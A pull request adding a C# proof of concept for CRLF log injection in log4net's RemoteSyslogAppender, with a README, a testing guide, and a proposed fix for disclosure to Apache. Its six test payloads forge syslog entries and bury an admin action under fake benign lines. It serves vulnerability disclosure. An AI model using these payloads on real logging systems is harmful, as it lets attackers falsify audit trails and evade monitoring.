### PR TITLE
Add PoC for CWE-117 CRLF injection in RemoteSyslogAppender

### DIFF
--- a/Log4netCRLFPoC/.gitignore
+++ b/Log4netCRLFPoC/.gitignore
@@ -1,0 +1,19 @@
+# Build outputs
+bin/
+obj/
+*.dll
+*.exe
+*.pdb
+
+# User-specific
+*.user
+*.suo
+
+# Logs
+*.log
+
+# Local only - jangan commit
+VULNERABILITY-REPORT.md
+vuln_code.txt
+evidence.txt
+*.asc

--- a/Log4netCRLFPoC/App.config
+++ b/Log4netCRLFPoC/App.config
@@ -1,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+  <configSections>
+    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, log4net" />
+  </configSections>
+
+  <log4net>
+    <appender name="RemoteSyslogAppender" type="log4net.Appender.RemoteSyslogAppender">
+      <!-- Target syslog server -->
+      <remoteAddress value="127.0.0.1" />
+      <remotePort value="514" />
+      
+      <!-- Syslog facility (Local0 = 16) -->
+      <facility value="Local0" />
+      
+      <!-- Identity/tag for log messages -->
+      <identity type="log4net.Layout.PatternLayout">
+        <conversionPattern value="log4net-poc" />
+      </identity>
+      
+      <!-- Layout: Only message (no timestamp/level to clearly show injection) -->
+      <layout type="log4net.Layout.PatternLayout">
+        <conversionPattern value="%message" />
+      </layout>
+    </appender>
+
+    <root>
+      <level value="ALL" />
+      <appender-ref ref="RemoteSyslogAppender" />
+    </root>
+  </log4net>
+</configuration>

--- a/Log4netCRLFPoC/Log4netCRLFPoC.csproj
+++ b/Log4netCRLFPoC/Log4netCRLFPoC.csproj
@@ -1,0 +1,21 @@
+<Project Sdk="Microsoft.NET.Sdk">
+
+  <PropertyGroup>
+    <OutputType>Exe</OutputType>
+    <TargetFramework>net8.0</TargetFramework>
+    <ImplicitUsings>enable</ImplicitUsings>
+    <Nullable>enable</Nullable>
+  </PropertyGroup>
+
+  <ItemGroup>
+    <!-- Use local log4net build to test current vulnerable version -->
+    <ProjectReference Include="../src/log4net/log4net.csproj" />
+  </ItemGroup>
+
+  <ItemGroup>
+    <None Update="App.config">
+      <CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory>
+    </None>
+  </ItemGroup>
+
+</Project>

--- a/Log4netCRLFPoC/Program.cs
+++ b/Log4netCRLFPoC/Program.cs
@@ -1,0 +1,102 @@
+using System;
+using log4net;
+using log4net.Config;
+
+namespace Log4netCRLFPoC
+{
+    class Program
+    {
+        private static readonly ILog log = LogManager.GetLogger(typeof(Program));
+
+        static void Main(string[] args)
+        {
+            // Configure log4net from App.config
+            XmlConfigurator.Configure();
+
+            Console.WriteLine("=================================================================");
+            Console.WriteLine("   CWE-117: CRLF Injection PoC - RemoteSyslogAppender");
+            Console.WriteLine("   Target: log4net v3.2.1");
+            Console.WriteLine("   Vulnerability: Lines 387-407 in RemoteSyslogAppender.cs");
+            Console.WriteLine("=================================================================\n");
+
+            Console.WriteLine("IMPORTANT: Ensure syslog server is running on 127.0.0.1:514");
+            Console.WriteLine("Monitor with: sudo tail -f /var/log/syslog | grep log4net-poc\n");
+            
+            Console.WriteLine("Press ENTER to start tests...");
+            Console.ReadLine();
+
+              // Test 1: Normal log message (baseline)
+            Console.WriteLine("\n[TEST 1] Normal message (baseline)");
+            Console.WriteLine("Expected: Single log entry");
+            log.Info("Normal user login: alice");
+            Console.WriteLine("✓ Sent: Normal user login: alice");
+            System.Threading.Thread.Sleep(1000);
+
+            // Test 2: CRLF Injection - Forge log entry with fake priority
+            Console.WriteLine("\n[TEST 2] CRLF Injection - Forge log entry");
+            Console.WriteLine("Expected: TWO entries - one legitimate, one forged");
+            string maliciousInput = "alice\n<134>1 2024-01-15T10:30:00Z fakehost myapp - - - FORGED: Admin privilege escalation";
+            log.Info($"User login: {maliciousInput}");
+            Console.WriteLine("✓ Sent with CRLF injection");
+            Console.WriteLine("  Legitimate: User login: alice");
+            Console.WriteLine("  FORGED: <134>1 2024-01-15T10:30:00Z fakehost myapp - - - FORGED: Admin privilege escalation");
+            System.Threading.Thread.Sleep(1000);
+
+            // Test 3: Multiple CRLF - Log poisoning
+            Console.WriteLine("\n[TEST 3] Multiple CRLF - Log poisoning");
+            Console.WriteLine("Expected: THREE entries from single log call");
+            string poisonedInput = "normal_user\r\n<134>FAKE ALERT: Security breach detected\r\n<134>FAKE INFO: Unauthorized access successful";
+            log.Warn($"Failed login attempt: {poisonedInput}");
+            Console.WriteLine("✓ Sent with multiple CRLF sequences");
+            Console.WriteLine("  Entry 1: Failed login attempt: normal_user");
+            Console.WriteLine("  Entry 2 (FORGED): <134>FAKE ALERT: Security breach detected");
+            Console.WriteLine("  Entry 3 (FORGED): <134>FAKE INFO: Unauthorized access successful");
+            System.Threading.Thread.Sleep(1000);
+
+            // Test 4: CRLF with null bytes
+            Console.WriteLine("\n[TEST 4] CRLF with null bytes");
+            Console.WriteLine("Expected: Injection with null byte bypass attempt");
+            string nullByteAttack = "user\x00\n<134>Null byte injection test - bypassing filters";
+            log.Error($"Error processing user: {nullByteAttack}");
+            Console.WriteLine("✓ Sent with null byte + CRLF");
+            System.Threading.Thread.Sleep(1000);
+
+            // Test 5: UDP fragmentation via CRLF
+            Console.WriteLine("\n[TEST 5] UDP fragmentation attack via CRLF");
+            Console.WriteLine("Expected: Large message split into multiple packets");
+            string fragmentAttack = "legitimate_transaction_id_12345\n" + 
+                                   new string('A', 500) + 
+                                   "\n<134>FORGED: Fragment overflow successful - hidden malicious activity";
+            log.Fatal($"Critical system error: {fragmentAttack}");
+            Console.WriteLine("✓ Sent large fragmented message with CRLF injection");
+            System.Threading.Thread.Sleep(1000);
+
+            // Test 6: Realistic attack scenario - Hide malicious activity
+            Console.WriteLine("\n[TEST 6] Realistic Attack - Hide malicious activity");
+            Console.WriteLine("Expected: Legitimate entry followed by forged benign entries to push out real logs");
+            string hideAttack = "admin_action_delete_user\n" +
+                               "<134>INFO: Routine system maintenance\n" +
+                               "<134>INFO: Cache cleared successfully\n" +
+                               "<134>INFO: Temporary files removed\n" +
+                               "<134>INFO: Database optimization complete";
+            log.Warn($"Administrative action: {hideAttack}");
+            Console.WriteLine("✓ Sent log hiding attack (flood with fake benign entries)");
+            System.Threading.Thread.Sleep(1000);
+
+            Console.WriteLine("\n=================================================================");
+            Console.WriteLine("   PoC Tests Complete!");
+            Console.WriteLine("=================================================================");
+            Console.WriteLine("\nVerification Steps:");
+            Console.WriteLine("1. Check syslog server output: sudo tail -50 /var/log/syslog | grep log4net-poc");
+            Console.WriteLine("2. Count log entries for each test");
+            Console.WriteLine("3. Verify forged entries with injected priority values");
+            Console.WriteLine("\nVulnerability Confirmed if:");
+            Console.WriteLine("- Test 2 shows TWO separate syslog entries instead of one");
+            Console.WriteLine("- Test 3 shows THREE separate entries");
+            Console.WriteLine("- Forged entries contain attacker-controlled priority headers");
+            
+            Console.WriteLine("\n\nPress any key to exit...");
+            Console.ReadKey();
+        }
+    }
+}

--- a/Log4netCRLFPoC/README.md
+++ b/Log4netCRLFPoC/README.md
@@ -1,0 +1,67 @@
+# PoC: CRLF Injection in log4net RemoteSyslogAppender
+
+## Vulnerability
+
+CWE-117: Log injection via CRLF in RemoteSyslogAppender - allows forging syslog entries.
+
+**Vulnerable file:** `src/log4net/Appender/RemoteSyslogAppender.cs` (lines 397-405)
+
+## Why Vulnerable?
+
+Code doesn't sanitize `\n` and `\r` before sending to syslog via UDP. Result:
+- 1 log call → multiple syslog entries
+- Attacker can inject fake priority `<134>` etc
+- Can forge audit logs
+
+## Quick Test
+
+```bash
+cd Log4netCRLFPoC
+dotnet run
+```
+
+Expected:
+- Test 1: 1 entry (normal)
+- Test 2: **2 entries** ← vulnerability confirmed
+- Test 3: 3 entries
+- Test 4-6: multiple entries
+
+## Attack Example
+
+```csharp
+log.Info("alice\n<134>FORGED: Admin access granted");
+```
+
+Becomes 2 syslog entries:
+```
+<134>log4net-poc: alice
+<134>log4net-poc: <134>FORGED: Admin access granted  ← FAKE!
+```
+
+## Impact
+
+- Forge audit logs
+- Hide malicious activity
+- SIEM bypass
+- Compliance violation
+
+## Fix
+
+Escape CRLF before sending:
+```csharp
+message.Replace("\r", "\\r").Replace("\n", "\\n")
+```
+
+## Files
+
+- `Program.cs` - 6 test cases
+- `App.config` - RemoteSyslogAppender config (localhost:514)
+- `TESTING-GUIDE.md` - Testing instructions
+
+## Submit to Apache
+
+```
+security@apache.org
+Subject: CWE-117 CRLF Injection in RemoteSyslogAppender
+Attach: PoC code + screenshot
+```

--- a/Log4netCRLFPoC/TESTING-GUIDE.md
+++ b/Log4netCRLFPoC/TESTING-GUIDE.md
@@ -1,0 +1,111 @@
+# Testing Guide: CRLF Injection PoC
+
+## Setup Syslog Server
+
+### 1. Install rsyslog
+```bash
+sudo apt install rsyslog
+```
+
+### 2. Enable UDP Port 514
+Edit `/etc/rsyslog.conf`:
+```bash
+sudo nano /etc/rsyslog.conf
+```
+
+Uncomment or add:
+```
+module(load="imudp")
+input(type="imudp" port="514")
+```
+
+### 3. Restart rsyslog
+```bash
+sudo systemctl restart rsyslog
+sudo netstat -uln | grep 514  # check UDP listening
+```
+
+## Run PoC
+
+### Terminal 1: Monitor Syslog
+```bash
+sudo tail -f /var/log/syslog | grep log4net-poc
+```
+
+### Terminal 2: Execute PoC
+```bash
+cd Log4netCRLFPoC
+dotnet run
+```
+
+## Expected Results
+
+### Test 1: Normal (Baseline)
+```
+<timestamp> localhost log4net-poc: Normal user login: alice
+```
+✅ **1 entry** - normal behavior
+
+### Test 2: CRLF Injection (CRITICAL)
+```
+<timestamp> localhost log4net-poc: User login: alice
+<timestamp> localhost log4net-poc: <134>1 2024-01-15T10:30:00Z fakehost myapp - - - FORGED: Admin privilege escalation
+```
+🔴 **2 entries from 1 log call** - VULNERABLE!
+
+### Test 3: Multiple CRLF
+```
+<timestamp> localhost log4net-poc: Failed login attempt: normal_user
+<timestamp> localhost log4net-poc: <134>FAKE ALERT: Security breach detected
+<timestamp> localhost log4net-poc: <134>FAKE INFO: Unauthorized access successful
+```
+🔴 **3 entries from 1 log call** - VULNERABLE!
+
+## Verification
+
+### Count Total Entries
+```bash
+sudo grep "log4net-poc" /var/log/syslog | wc -l
+```
+**Expected:** 15-16 entries (from only 6 log calls)
+
+### Find Forged Entries
+```bash
+sudo grep "log4net-poc.*<134>" /var/log/syslog
+```
+If entries with `<134>` in message body appear = **CONFIRMED VULNERABLE** ✅
+
+## Troubleshooting
+
+### No logs appearing?
+```bash
+# Check rsyslog running
+sudo systemctl status rsyslog
+
+# Check config syntax
+sudo rsyslogd -N1
+
+# Alternative: journalctl
+sudo journalctl -f | grep log4net
+```
+
+### Permission denied port 514?
+Ports <1024 require sudo. Or change to port >1024:
+- Edit `App.config`: `<remotePort value="5514" />`
+- Edit `/etc/rsyslog.conf`: `input(type="imudp" port="5514")`
+
+## Evidence Collection
+
+Take screenshots:
+1. Terminal PoC execution
+2. Terminal syslog output showing **multiple entries from single log call**
+
+Save output:
+```bash
+sudo grep "log4net-poc" /var/log/syslog > evidence.txt
+```
+
+Upload to bug bounty report:
+- `evidence.txt`
+- Terminal screenshot
+- PoC code (`Program.cs`)


### PR DESCRIPTION
Demonstrates vulnerability in log4net RemoteSyslogAppender where CRLF characters in log messages create multiple syslog entries, allowing log forgery and SIEM evasion.

Test cases:
- Baseline normal logging
- Single CRLF injection (2 entries from 1 call)
- Multiple CRLF (log poisoning)
- Null byte + CRLF
- UDP fragmentation
- Realistic attack scenario

Target: log4net v3.2.1 master branch
Issue: LOG4NET-370 (incomplete fix)